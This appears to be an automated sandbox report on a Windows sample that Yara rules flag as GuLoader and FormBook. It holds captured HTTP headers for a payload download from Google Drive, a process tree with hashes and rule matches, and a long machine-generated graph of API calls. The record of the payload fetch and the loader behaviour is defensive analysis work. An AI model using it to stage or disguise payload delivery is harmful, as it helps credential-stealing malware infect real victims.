                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-02-28 12:26:23 UTC | 4693 | IN | HTTP/1.1 200 OK
                                                                X-GUploader-UploadID: ABPtcPqsWbDQ_vy00509DFsnnML2MzHcNyvUZiGGK7E28XiY0zL1gnJcQRs2SWh5_w9UxewwnmBEXomw6Q
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="YUMHfNEXOoJa168.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 273984
                                                                Last-Modified: Tue, 27 Feb 2024 10:01:37 GMT
                                                                Date: Wed, 28 Feb 2024 12:26:23 GMT
                                                                Expires: Wed, 28 Feb 2024 12:26:23 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=svF81w==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Target ID:0
                                                                Start time:13:25:37
                                                                Start date:28/02/2024
                                                                Path:C:\Users\user\Desktop\rResegregation.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\rResegregation.exe
                                                                Imagebase:0x400000
                                                                File size:883'592 bytes
                                                                MD5 hash:B64F1F87FDC7E8BD3D053D058FC08F4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:13:26:09
                                                                Start date:28/02/2024
                                                                Path:C:\Users\user\Desktop\rResegregation.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\rResegregation.exe
                                                                Imagebase:0x400000
                                                                File size:883'592 bytes
                                                                MD5 hash:B64F1F87FDC7E8BD3D053D058FC08F4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:13:26:28
                                                                Start date:28/02/2024
                                                                Path:C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe"
                                                                Imagebase:0x350000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:13:26:30
                                                                Start date:28/02/2024
                                                                Path:C:\Windows\SysWOW64\winrshost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\winrshost.exe
                                                                Imagebase:0x220000
                                                                File size:24'064 bytes
                                                                MD5 hash:9EB3371F7B80A434CC9F468B330A9928
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:13:26:37
                                                                Start date:28/02/2024
                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                Imagebase:0x140000000
                                                                File size:16'696'840 bytes
                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:13:29:04
                                                                Start date:28/02/2024
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff7b4420000
                                                                File size:4'849'904 bytes
                                                                MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                  Execution Graph

                                                                  Execution Coverage:20.8%
                                                                  Dynamic/Decrypted Code Coverage:14.4%
                                                                  Signature Coverage:20.9%
                                                                  Total number of Nodes:1461
                                                                  Total number of Limit Nodes:42
100012d1 4516->4562 4517->4516 4518->4516 4519->4516 4520->4516 4521->4516 4522->4427 4523->4516 4566 10001215 GlobalAlloc 4525->4566 4527 1000155f 4529 10001586 4527->4529 4530 1000156c lstrcpyA 4527->4530 4531 100015a0 4529->4531 4532 1000158b wsprintfA 4529->4532 4530->4531 4533 10001266 4531->4533 4532->4531 4534 100012a8 GlobalFree 4533->4534 4535 1000126f GlobalAlloc lstrcpynA 4533->4535 4534->4432 4535->4534 4537 100017c5 4536->4537 4538 100023ae 4536->4538 4537->4446 4537->4447 4538->4537 4539 100023c7 GlobalFree 4538->4539 4539->4538 4541 10001266 2 API calls 4540->4541 4542 10001503 4541->4542 4542->4440 4543->4454 4544->4461 4546 10001552 4545->4546 4546->4483 4553 10001215 GlobalAlloc 4547->4553 4549 10001233 lstrcpynA 4549->4473 4550->4461 4551->4474 4552->4480 4553->4549 4555 100012b4 4554->4555 4556 10001224 2 API calls 4555->4556 4557 100012cf 4556->4557 4557->4493 4559 10002581 4558->4559 4560 1000252b VirtualAlloc 4558->4560 4559->4492 4560->4559 4561->4516 4563 100012f9 4562->4563 4564 100012da 4562->4564 4563->4516 4564->4563 4565 100012e0 lstrcpyA 4564->4565 4565->4563 4566->4527 5090 401490 5091 404f25 25 API calls 5090->5091 5092 401497 5091->5092 5093 401595 5094 402a3a 18 API calls 5093->5094 5095 40159c SetFileAttributesA 5094->5095 5096 4015ae 5095->5096 4629 402616 4630 40261d 4629->4630 4636 40287c 4629->4636 4631 402a1d 18 API calls 4630->4631 4632 402628 4631->4632 4633 40262f SetFilePointer 4632->4633 4634 40263f 4633->4634 4633->4636 4637 405c6a wsprintfA 4634->4637 4637->4636 5097 401717 5098 402a3a 18 API calls 5097->5098 5099 40171e SearchPathA 5098->5099 5100 401739 5099->5100 5101 10001058 5103 10001074 5101->5103 5102 100010dc 5103->5102 5104 100014bb GlobalFree 5103->5104 5105 10001091 5103->5105 5104->5105 5106 100014bb GlobalFree 5105->5106 5107 100010a1 5106->5107 5108 100010b1 5107->5108 5109 100010a8 GlobalSize 5107->5109 5110 100010b5 GlobalAlloc 5108->5110 5111 100010c6 5108->5111 5109->5108 5112 100014e2 3 API calls 
5110->5112 5113 100010d1 GlobalFree 5111->5113 5112->5111 5113->5102 5114 404e99 5115 404ea9 5114->5115 5116 404ebd 5114->5116 5117 404eaf 5115->5117 5126 404f06 5115->5126 5118 404ec5 IsWindowVisible 5116->5118 5122 404edc 5116->5122 5120 403f3d SendMessageA 5117->5120 5121 404ed2 5118->5121 5118->5126 5119 404f0b CallWindowProcA 5123 404eb9 5119->5123 5120->5123 5127 4047f0 SendMessageA 5121->5127 5122->5119 5132 404870 5122->5132 5126->5119 5128 404813 GetMessagePos ScreenToClient SendMessageA 5127->5128 5129 40484f SendMessageA 5127->5129 5130 404847 5128->5130 5131 40484c 5128->5131 5129->5130 5130->5122 5131->5129 5141 405d0c lstrcpynA 5132->5141 5134 404883 5142 405c6a wsprintfA 5134->5142 5136 40488d 5137 40140b 2 API calls 5136->5137 5138 404896 5137->5138 5143 405d0c lstrcpynA 5138->5143 5140 40489d 5140->5126 5141->5134 5142->5136 5143->5140 5144 402519 5145 40252e 5144->5145 5146 40251e 5144->5146 5148 402a3a 18 API calls 5145->5148 5147 402a1d 18 API calls 5146->5147 5150 402527 5147->5150 5149 402535 lstrlenA 5148->5149 5149->5150 5151 402557 5150->5151 5152 405a26 WriteFile 5150->5152 5152->5151 5153 40149d 5154 4014ab PostQuitMessage 5153->5154 5155 40226e 5153->5155 5154->5155 4653 403a1e 4654 403b71 4653->4654 4655 403a36 4653->4655 4657 403b82 GetDlgItem GetDlgItem 4654->4657 4658 403bc2 4654->4658 4655->4654 4656 403a42 4655->4656 4660 403a60 4656->4660 4661 403a4d SetWindowPos 4656->4661 4662 403ef1 19 API calls 4657->4662 4659 403c1c 4658->4659 4670 401389 2 API calls 4658->4670 4664 403f3d SendMessageA 4659->4664 4671 403b6c 4659->4671 4665 403a65 ShowWindow 4660->4665 4666 403a7d 4660->4666 4661->4660 4663 403bac SetClassLongA 4662->4663 4667 40140b 2 API calls 4663->4667 4691 403c2e 4664->4691 4665->4666 4668 403a85 DestroyWindow 4666->4668 4669 403a9f 4666->4669 4667->4658 4672 403e7a 4668->4672 4673 403aa4 SetWindowLongA 4669->4673 4674 403ab5 4669->4674 4675 403bf4 4670->4675 4672->4671 4684 403eab ShowWindow 4672->4684 4673->4671 4677 
403ac1 GetDlgItem 4674->4677 4678 403b5e 4674->4678 4675->4659 4679 403bf8 SendMessageA 4675->4679 4676 403e7c DestroyWindow EndDialog 4676->4672 4681 403af1 4677->4681 4682 403ad4 SendMessageA IsWindowEnabled 4677->4682 4683 403f58 8 API calls 4678->4683 4679->4671 4680 40140b 2 API calls 4680->4691 4686 403afe 4681->4686 4688 403b45 SendMessageA 4681->4688 4689 403b11 4681->4689 4697 403af6 4681->4697 4682->4671 4682->4681 4683->4671 4684->4671 4685 405d2e 18 API calls 4685->4691 4686->4688 4686->4697 4687 403eca SendMessageA 4690 403b2c 4687->4690 4688->4678 4692 403b19 4689->4692 4693 403b2e 4689->4693 4690->4678 4691->4671 4691->4676 4691->4680 4691->4685 4694 403ef1 19 API calls 4691->4694 4699 403ef1 19 API calls 4691->4699 4714 403dbc DestroyWindow 4691->4714 4696 40140b 2 API calls 4692->4696 4695 40140b 2 API calls 4693->4695 4694->4691 4698 403b35 4695->4698 4696->4697 4697->4687 4698->4678 4698->4697 4700 403ca9 GetDlgItem 4699->4700 4701 403cc6 ShowWindow KiUserCallbackDispatcher 4700->4701 4702 403cbe 4700->4702 4723 403f13 KiUserCallbackDispatcher 4701->4723 4702->4701 4704 403cf0 EnableWindow 4707 403d04 4704->4707 4705 403d09 GetSystemMenu EnableMenuItem SendMessageA 4706 403d39 SendMessageA 4705->4706 4705->4707 4706->4707 4707->4705 4724 403f26 SendMessageA 4707->4724 4725 405d0c lstrcpynA 4707->4725 4710 403d67 lstrlenA 4711 405d2e 18 API calls 4710->4711 4712 403d78 SetWindowTextA 4711->4712 4713 401389 2 API calls 4712->4713 4713->4691 4714->4672 4715 403dd6 CreateDialogParamA 4714->4715 4715->4672 4716 403e09 4715->4716 4717 403ef1 19 API calls 4716->4717 4718 403e14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4717->4718 4719 401389 2 API calls 4718->4719 4720 403e5a 4719->4720 4720->4671 4721 403e62 ShowWindow 4720->4721 4722 403f3d SendMessageA 4721->4722 4722->4672 4723->4704 4724->4707 4725->4710 5156 100010e0 5165 1000110e 5156->5165 5157 100011c4 GlobalFree 5158 100012ad 2 API calls 5158->5165 5159 100011c3 5159->5157 5160 
10001266 2 API calls 5164 100011b1 GlobalFree 5160->5164 5161 10001155 GlobalAlloc 5161->5165 5162 100011ea GlobalFree 5162->5165 5163 100012d1 lstrcpyA 5163->5165 5164->5165 5165->5157 5165->5158 5165->5159 5165->5160 5165->5161 5165->5162 5165->5163 5165->5164 5166 4048a2 GetDlgItem GetDlgItem 5167 4048f4 7 API calls 5166->5167 5175 404b0c 5166->5175 5168 404997 DeleteObject 5167->5168 5169 40498a SendMessageA 5167->5169 5170 4049a0 5168->5170 5169->5168 5172 4049d7 5170->5172 5174 405d2e 18 API calls 5170->5174 5171 404bf0 5173 404c9c 5171->5173 5182 404c49 SendMessageA 5171->5182 5208 404aff 5171->5208 5176 403ef1 19 API calls 5172->5176 5178 404ca6 SendMessageA 5173->5178 5179 404cae 5173->5179 5180 4049b9 SendMessageA SendMessageA 5174->5180 5175->5171 5185 4047f0 5 API calls 5175->5185 5209 404b7d 5175->5209 5177 4049eb 5176->5177 5181 403ef1 19 API calls 5177->5181 5178->5179 5190 404cc0 ImageList_Destroy 5179->5190 5191 404cc7 5179->5191 5201 404cd7 5179->5201 5180->5170 5186 4049f9 5181->5186 5188 404c5e SendMessageA 5182->5188 5182->5208 5183 403f58 8 API calls 5189 404e92 5183->5189 5184 404be2 SendMessageA 5184->5171 5185->5209 5193 404acd GetWindowLongA SetWindowLongA 5186->5193 5200 404a48 SendMessageA 5186->5200 5203 404ac7 5186->5203 5205 404a84 SendMessageA 5186->5205 5206 404a95 SendMessageA 5186->5206 5187 404e46 5195 404e58 ShowWindow GetDlgItem ShowWindow 5187->5195 5187->5208 5194 404c71 5188->5194 5190->5191 5192 404cd0 GlobalFree 5191->5192 5191->5201 5192->5201 5196 404ae6 5193->5196 5202 404c82 SendMessageA 5194->5202 5195->5208 5197 404b04 5196->5197 5198 404aec ShowWindow 5196->5198 5218 403f26 SendMessageA 5197->5218 5217 403f26 SendMessageA 5198->5217 5200->5186 5201->5187 5207 404870 4 API calls 5201->5207 5213 404d12 5201->5213 5202->5173 5203->5193 5203->5196 5205->5186 5206->5186 5207->5213 5208->5183 5209->5171 5209->5184 5210 404e1c InvalidateRect 5210->5187 5211 404e32 5210->5211 5219 4047ab 5211->5219 5212 404d40 SendMessageA 
5216 404d56 5212->5216 5213->5212 5213->5216 5215 404dca SendMessageA SendMessageA 5215->5216 5216->5210 5216->5215 5217->5208 5218->5175 5222 4046e6 5219->5222 5221 4047c0 5221->5187 5223 4046fc 5222->5223 5224 405d2e 18 API calls 5223->5224 5225 404760 5224->5225 5226 405d2e 18 API calls 5225->5226 5227 40476b 5226->5227 5228 405d2e 18 API calls 5227->5228 5229 404781 lstrlenA wsprintfA SetDlgItemTextA 5228->5229 5229->5221 5230 10002162 5231 100021c0 5230->5231 5232 100021f6 5230->5232 5231->5232 5233 100021d2 GlobalAlloc 5231->5233 5233->5231 5234 401ca7 5235 402a1d 18 API calls 5234->5235 5236 401cae 5235->5236 5237 402a1d 18 API calls 5236->5237 5238 401cb6 GetDlgItem 5237->5238 5239 402513 5238->5239 3993 40192a 3994 40192c 3993->3994 3995 402a3a 18 API calls 3994->3995 3996 401931 3995->3996 3999 4055ae 3996->3999 4039 40586c 3999->4039 4002 4055d6 DeleteFileA 4004 40193a 4002->4004 4003 4055ed 4005 40571b 4003->4005 4053 405d0c lstrcpynA 4003->4053 4005->4004 4071 406010 FindFirstFileA 4005->4071 4007 405613 4008 405626 4007->4008 4009 405619 lstrcatA 4007->4009 4054 4057c5 lstrlenA 4008->4054 4010 40562c 4009->4010 4014 40563a lstrcatA 4010->4014 4016 405645 lstrlenA FindFirstFileA 4010->4016 4014->4016 4015 405743 4074 40577e lstrlenA CharPrevA 4015->4074 4016->4005 4027 405669 4016->4027 4019 4057a9 CharNextA 4019->4027 4020 405566 5 API calls 4021 405755 4020->4021 4022 405759 4021->4022 4023 40576f 4021->4023 4022->4004 4029 404f25 25 API calls 4022->4029 4026 404f25 25 API calls 4023->4026 4024 4056fa FindNextFileA 4024->4027 4028 405712 FindClose 4024->4028 4026->4004 4027->4019 4027->4024 4036 4056bb 4027->4036 4058 405d0c lstrcpynA 4027->4058 4028->4005 4030 405766 4029->4030 4031 405bc7 38 API calls 4030->4031 4034 40576d 4031->4034 4033 4055ae 62 API calls 4033->4036 4034->4004 4035 404f25 25 API calls 4035->4024 4036->4024 4036->4033 4036->4035 4037 404f25 25 API calls 4036->4037 4059 405566 4036->4059 4067 405bc7 MoveFileExA 4036->4067 
4037->4036 4077 405d0c lstrcpynA 4039->4077 4041 40587d 4078 405817 CharNextA CharNextA 4041->4078 4044 4055ce 4044->4002 4044->4003 4045 405f77 5 API calls 4051 405893 4045->4051 4046 4058be lstrlenA 4047 4058c9 4046->4047 4046->4051 4049 40577e 3 API calls 4047->4049 4048 406010 2 API calls 4048->4051 4050 4058ce GetFileAttributesA 4049->4050 4050->4044 4051->4044 4051->4046 4051->4048 4052 4057c5 2 API calls 4051->4052 4052->4046 4053->4007 4055 4057d2 4054->4055 4056 4057e3 4055->4056 4057 4057d7 CharPrevA 4055->4057 4056->4010 4057->4055 4057->4056 4058->4027 4084 40595a GetFileAttributesA 4059->4084 4062 405581 RemoveDirectoryA 4064 40558f 4062->4064 4063 405589 DeleteFileA 4063->4064 4065 405593 4064->4065 4066 40559f SetFileAttributesA 4064->4066 4065->4036 4066->4065 4068 405bdb 4067->4068 4070 405be8 4067->4070 4087 405a55 lstrcpyA 4068->4087 4070->4036 4072 40573f 4071->4072 4073 406026 FindClose 4071->4073 4072->4004 4072->4015 4073->4072 4075 405749 4074->4075 4076 405798 lstrcatA 4074->4076 4075->4020 4076->4075 4077->4041 4079 405842 4078->4079 4080 405832 4078->4080 4082 4057a9 CharNextA 4079->4082 4083 405862 4079->4083 4080->4079 4081 40583d CharNextA 4080->4081 4081->4083 4082->4079 4083->4044 4083->4045 4085 405572 4084->4085 4086 40596c SetFileAttributesA 4084->4086 4085->4062 4085->4063 4085->4065 4086->4085 4088 405aa3 GetShortPathNameA 4087->4088 4089 405a7d 4087->4089 4091 405bc2 4088->4091 4092 405ab8 4088->4092 4114 40597f GetFileAttributesA CreateFileA 4089->4114 4091->4070 4092->4091 4094 405ac0 wsprintfA 4092->4094 4093 405a87 CloseHandle GetShortPathNameA 4093->4091 4095 405a9b 4093->4095 4096 405d2e 18 API calls 4094->4096 4095->4088 4095->4091 4097 405ae8 4096->4097 4115 40597f GetFileAttributesA CreateFileA 4097->4115 4099 405af5 4099->4091 4100 405b04 GetFileSize GlobalAlloc 4099->4100 4101 405b26 4100->4101 4102 405bbb CloseHandle 4100->4102 4103 4059f7 ReadFile 4101->4103 4102->4091 4104 405b2e 4103->4104 4104->4102 4116 4058e4 
lstrlenA 4104->4116 4107 405b45 lstrcpyA 4110 405b67 4107->4110 4108 405b59 4109 4058e4 4 API calls 4108->4109 4109->4110 4111 405b9e SetFilePointer 4110->4111 4112 405a26 WriteFile 4111->4112 4113 405bb4 GlobalFree 4112->4113 4113->4102 4114->4093 4115->4099 4117 405925 lstrlenA 4116->4117 4118 4058fe lstrcmpiA 4117->4118 4119 40592d 4117->4119 4118->4119 4120 40591c CharNextA 4118->4120 4119->4107 4119->4108 4120->4117 5240 4028aa SendMessageA 5241 4028c4 InvalidateRect 5240->5241 5242 4028cf 5240->5242 5241->5242 5243 40432f 5244 40435b 5243->5244 5245 40436c 5243->5245 5304 4054e6 GetDlgItemTextA 5244->5304 5247 404378 GetDlgItem 5245->5247 5248 4043d7 5245->5248 5251 40438c 5247->5251 5249 4044bb 5248->5249 5258 405d2e 18 API calls 5248->5258 5302 404665 5248->5302 5249->5302 5306 4054e6 GetDlgItemTextA 5249->5306 5250 404366 5252 405f77 5 API calls 5250->5252 5253 4043a0 SetWindowTextA 5251->5253 5256 405817 4 API calls 5251->5256 5252->5245 5257 403ef1 19 API calls 5253->5257 5255 403f58 8 API calls 5260 404679 5255->5260 5261 404396 5256->5261 5262 4043bc 5257->5262 5263 40444b SHBrowseForFolderA 5258->5263 5259 4044eb 5264 40586c 18 API calls 5259->5264 5261->5253 5268 40577e 3 API calls 5261->5268 5265 403ef1 19 API calls 5262->5265 5263->5249 5266 404463 CoTaskMemFree 5263->5266 5267 4044f1 5264->5267 5269 4043ca 5265->5269 5270 40577e 3 API calls 5266->5270 5307 405d0c lstrcpynA 5267->5307 5268->5253 5305 403f26 SendMessageA 5269->5305 5272 404470 5270->5272 5275 4044a7 SetDlgItemTextA 5272->5275 5279 405d2e 18 API calls 5272->5279 5274 4043d0 5277 4060a5 5 API calls 5274->5277 5275->5249 5276 404508 5278 4060a5 5 API calls 5276->5278 5277->5248 5285 40450f 5278->5285 5281 40448f lstrcmpiA 5279->5281 5280 40454b 5308 405d0c lstrcpynA 5280->5308 5281->5275 5282 4044a0 lstrcatA 5281->5282 5282->5275 5284 404552 5286 405817 4 API calls 5284->5286 5285->5280 5290 4057c5 2 API calls 5285->5290 5291 4045a3 5285->5291 5287 404558 GetDiskFreeSpaceA 5286->5287 
5289 40457c MulDiv 5287->5289 5287->5291 5289->5291 5290->5285 5292 404614 5291->5292 5294 4047ab 21 API calls 5291->5294 5293 404637 5292->5293 5295 40140b 2 API calls 5292->5295 5309 403f13 KiUserCallbackDispatcher 5293->5309 5296 404601 5294->5296 5295->5293 5298 404616 SetDlgItemTextA 5296->5298 5299 404606 5296->5299 5298->5292 5301 4046e6 21 API calls 5299->5301 5300 404653 5300->5302 5310 4042c4 5300->5310 5301->5292 5302->5255 5304->5250 5305->5274 5306->5259 5307->5276 5308->5284 5309->5300 5311 4042d2 5310->5311 5312 4042d7 SendMessageA 5310->5312 5311->5312 5312->5302 4609 4015b3 4610 402a3a 18 API calls 4609->4610 4611 4015ba 4610->4611 4612 405817 4 API calls 4611->4612 4624 4015c2 4612->4624 4613 40161c 4615 401621 4613->4615 4616 40164a 4613->4616 4614 4057a9 CharNextA 4614->4624 4617 401423 25 API calls 4615->4617 4618 401423 25 API calls 4616->4618 4619 401628 4617->4619 4625 401642 4618->4625 4628 405d0c lstrcpynA 4619->4628 4621 405468 2 API calls 4621->4624 4622 405485 5 API calls 4622->4624 4623 401633 SetCurrentDirectoryA 4623->4625 4624->4613 4624->4614 4624->4621 4624->4622 4626 401604 GetFileAttributesA 4624->4626 4627 4053eb 4 API calls 4624->4627 4626->4624 4627->4624 4628->4623 5313 4016b3 5314 402a3a 18 API calls 5313->5314 5315 4016b9 GetFullPathNameA 5314->5315 5316 4016d0 5315->5316 5317 4016f1 5315->5317 5316->5317 5320 406010 2 API calls 5316->5320 5318 401705 GetShortPathNameA 5317->5318 5319 4028cf 5317->5319 5318->5319 5321 4016e1 5320->5321 5321->5317 5323 405d0c lstrcpynA 5321->5323 5323->5317 5324 4014b7 5325 4014bd 5324->5325 5326 401389 2 API calls 5325->5326 5327 4014c5 5326->5327 5328 401d38 GetDC GetDeviceCaps 5329 402a1d 18 API calls 5328->5329 5330 401d56 MulDiv ReleaseDC 5329->5330 5331 402a1d 18 API calls 5330->5331 5332 401d75 5331->5332 5333 405d2e 18 API calls 5332->5333 5334 401dae CreateFontIndirectA 5333->5334 5335 402513 5334->5335 5336 40403a 5337 404050 5336->5337 5342 40415c 5336->5342 5340 403ef1 19 API 
